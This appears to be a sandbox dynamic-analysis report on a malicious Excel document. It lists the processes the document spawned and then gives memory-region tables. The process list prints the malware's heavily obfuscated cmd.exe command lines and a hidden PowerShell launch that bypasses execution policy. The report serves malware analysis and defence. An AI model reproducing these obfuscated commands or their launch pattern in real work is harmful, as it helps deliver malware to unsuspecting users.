4095b316...48ab | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 95/100
Dynamic Analysis Report
Classification: -

4095b31681f998c808b2e7338fa8adec82c9f5049df457c9f0c0fc562e2a48ab (SHA256)

Doc061120182038778905.xls

Excel Document

Created at 2018-11-06 10:22:00

...
Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8f8 Analysis Target Medium excel.exe "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -
#3 0xac0 Child Process Medium cmd.exe CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) ) #1
#4 0xae0 Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /c ^f^t^Yp^e | ^f^IN^d "SHCm" #3
#5 0xae8 Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ftYpe " #4
#6 0xaf0 Child Process Medium find.exe fINd "SHCm" #4
#7 0xb04 Child Process Medium cmd.exe Cmd , ; ; ; pPuxarv/VCsv40blbkn , cw8f/r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )&&( , ( , (^s^e^t ^ ^ ^;^]=^!^'^}^_^-^:^j^U=^D^!) ) , )&( ; (^s^e^T ^ ^ ^`^\^+=^!^;^]^:^,^=^c^!) ; ; )&&( , ( , (S^e^T ^_^@^.^-=^!^`^\^+:^i^y^=^8^!) , , ) , , )&(^S^e^t ^ ^ ^ ^$^'=^ #3
#8 0xb24 Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /c ^ft^Y^p^e | ^f^iN^d^S^t^r ^c^m #7
#9 0xb2c Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ftYpe " #8
#10 0xb34 Child Process Medium findstr.exe fiNdStr cm #8
#11 0xb3c Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echO ,%*[-,% " #7
#12 0xb44 Child Process Medium cmd.exe cmd ; #7
#13 0xb4c Child Process Medium cmd.exe cmd.exE /c %adizY% #12
#14 0xb54 Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /S /D /c" EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) " #13
#15 0xb5c Child Process Medium powershell.exe POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd &( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) #13

Behavior Information - Grouped by Category

Process #1: excel.exe
1665 0
»
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\excel.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:16, Reason: Analysis Target
Unmonitor End Time: 00:04:57, Reason: Self Terminated
Monitor Duration 00:03:41
OS Process Information
»
Information Value
PID 0x8f8
Parent PID 0x39c (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A38
0x A34
0x A30
0x A2C
0x 9A0
0x 99C
0x 998
0x 968
0x 964
0x 960
0x 95C
0x 958
0x 954
0x 950
0x 94C
0x 948
0x 944
0x 940
0x 93C
0x 938
0x 918
0x 914
0x 910
0x 90C
0x 908
0x 904
0x 900
0x 8FC
0x A3C
0x A40
0x A44
0x A48
0x A4C
0x A58
0x A5C
0x A60
0x A90
0x A9C
0x B2C
0x 5FC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory rw True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory rw True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f6fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory rw True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory rw True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory rw True False False -
pagefile_0x0000000000130000 0x00130000 0x00132fff Pagefile Backed Memory r True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory - True False False -
private_0x0000000000150000 0x00150000 0x0024ffff Private Memory rw True False False -
pagefile_0x0000000000250000 0x00250000 0x00252fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000260000 0x00260000 0x00262fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000270000 0x00270000 0x00272fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000280000 0x00280000 0x00282fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000290000 0x00290000 0x00292fff Pagefile Backed Memory r True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a1fff Pagefile Backed Memory r True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory r True False False -
private_0x00000000002c0000 0x002c0000 0x002c0fff Private Memory rw True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory r True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory rw True False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory rw True False False -
private_0x00000000003f0000 0x003f0000 0x0042ffff Private Memory rw True False False -
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory rw True False False -
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000006c0000 0x006c0000 0x00840fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000850000 0x00850000 0x01c4ffff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01c50000 0x01f1efff Memory Mapped File r False False False -
pagefile_0x0000000001f20000 0x01f20000 0x02312fff Pagefile Backed Memory r True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory rw True False False -
pagefile_0x0000000002420000 0x02420000 0x02424fff Pagefile Backed Memory rw True False False -
private_0x0000000002430000 0x02430000 0x0243ffff Private Memory rw True False False -
private_0x0000000002440000 0x02440000 0x0263ffff Private Memory rw True False False -
pagefile_0x0000000002640000 0x02640000 0x0271efff Pagefile Backed Memory r True False False -
pagefile_0x0000000002720000 0x02720000 0x02720fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002730000 0x02730000 0x02730fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002740000 0x02740000 0x02740fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000002750000 0x02750000 0x02751fff Pagefile Backed Memory r True False False -
index.dat 0x02760000 0x0276bfff Memory Mapped File rw True False False -
index.dat 0x02770000 0x02777fff Memory Mapped File rw True False False -
private_0x0000000002780000 0x02780000 0x027fffff Private Memory rw True False False -
private_0x0000000002800000 0x02800000 0x028fffff Private Memory rw True False False -
index.dat 0x02900000 0x0290ffff Memory Mapped File rw True False False -
pagefile_0x0000000002910000 0x02910000 0x02910fff Pagefile Backed Memory r True False False -
private_0x0000000002920000 0x02920000 0x02920fff Private Memory rw True False False -
pagefile_0x0000000002930000 0x02930000 0x02931fff Pagefile Backed Memory r True False False -
private_0x0000000002940000 0x02940000 0x02940fff Private Memory rw True False False -
private_0x0000000002950000 0x02950000 0x0295ffff Private Memory rw True False False -
private_0x0000000002960000 0x02960000 0x02a5ffff Private Memory rw True False False -
private_0x0000000002a60000 0x02a60000 0x02a60fff Private Memory rw True False False -
private_0x0000000002a70000 0x02a70000 0x02a70fff Private Memory rw True False False -
private_0x0000000002a80000 0x02a80000 0x02a80fff Private Memory rw True False False -
private_0x0000000002a90000 0x02a90000 0x02b8ffff Private Memory rw True False False -
xlintl32.dll 0x02b90000 0x03bd7fff Memory Mapped File r False False False -
private_0x0000000003be0000 0x03be0000 0x03be0fff Private Memory rw True False False -
pagefile_0x0000000003bf0000 0x03bf0000 0x03bf0fff Pagefile Backed Memory r True False False -
private_0x0000000003c00000 0x03c00000 0x03c01fff Private Memory rw True False False -
private_0x0000000003c10000 0x03c10000 0x03c10fff Private Memory rw True False False -
pagefile_0x0000000003c20000 0x03c20000 0x03c21fff Pagefile Backed Memory r True False False -
private_0x0000000003c30000 0x03c30000 0x03c31fff Private Memory rw True False False -
private_0x0000000003c40000 0x03c40000 0x03d3ffff Private Memory rw True False False -
private_0x0000000003d40000 0x03d40000 0x03d40fff Private Memory rw True False False -
pagefile_0x0000000003d50000 0x03d50000 0x03d51fff Pagefile Backed Memory r True False False -
private_0x0000000003d60000 0x03d60000 0x03e5ffff Private Memory rw True False False -
cversions.2.db 0x03e60000 0x03e63fff Memory Mapped File r True False False -
cversions.2.db 0x03e70000 0x03e73fff Memory Mapped File r True False False -
pagefile_0x0000000003e80000 0x03e80000 0x03e81fff Pagefile Backed Memory r True False False -
pagefile_0x0000000003e90000 0x03e90000 0x03e90fff Pagefile Backed Memory r True False False -
comdlg32.dll.mui 0x03ea0000 0x03eacfff Memory Mapped File rw False False False -
pagefile_0x0000000003eb0000 0x03eb0000 0x03eb1fff Pagefile Backed Memory r True False False -
private_0x0000000003ec0000 0x03ec0000 0x03fbffff Private Memory rw True False False -
pagefile_0x0000000003fc0000 0x03fc0000 0x03fc1fff Pagefile Backed Memory r True False False -
private_0x0000000003fd0000 0x03fd0000 0x040cffff Private Memory rw True False False -
private_0x00000000040d0000 0x040d0000 0x041cffff Private Memory rw True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db 0x041d0000 0x041fffff Memory Mapped File r True False False -
pagefile_0x0000000004200000 0x04200000 0x04201fff Pagefile Backed Memory r True False False -
pagefile_0x0000000004210000 0x04210000 0x04211fff Pagefile Backed Memory r True False False -
